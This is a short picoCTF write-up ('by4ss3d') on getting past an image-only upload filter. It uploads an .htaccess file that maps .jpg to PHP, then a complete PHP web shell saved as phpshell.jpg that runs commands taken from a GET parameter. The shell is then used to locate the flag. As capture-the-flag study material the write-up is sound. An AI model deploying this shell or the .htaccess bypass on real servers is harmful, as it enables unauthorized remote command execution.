by4ss3d

This challenge requires a uncommon knowledge about .htaccess file and its misconfigurations. We're told from the very begging that the only files accepted there are the following ones:

Upload Image File (JPG, PNG, or GIF):

I tried trick the system with files like exploit.jpg.php but nothing worked.

If we check the hints from picoctf we get:

Apache can be tricked into executing non-PHP files as PHP with a .htaccess file.

After a little bit of research I realized that I could upload the .htaccess file (without any extension) and practically setting a new rule for that directory (/upload.php).

.htaccess file:

AddType application/x-httpd-php .jpg (meaning the system treats every .jpg file as a .php)

Then it goes without saying that I created a phpshell with the extension .jpg.

phpshell.jpg file:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php if(isset($_GET['cmd'])) { system($_GET['cmd'] . ' 2>&1'); } ?>
</pre>
</body>
</html>

With all of these I tricked the server to give me a shell on the following path: /upload.php/images/phpshell.jpg (or smth like that)

Then located the flag.txt messing around with ls (located it in ../.. directory).

made by k0d

PreviousCrack the Gate 2 NextForbidden Paths

Last updated 26 days ago

hashtag.htaccess file:

hashtagphpshell.jpg file:

.htaccess file:

phpshell.jpg file: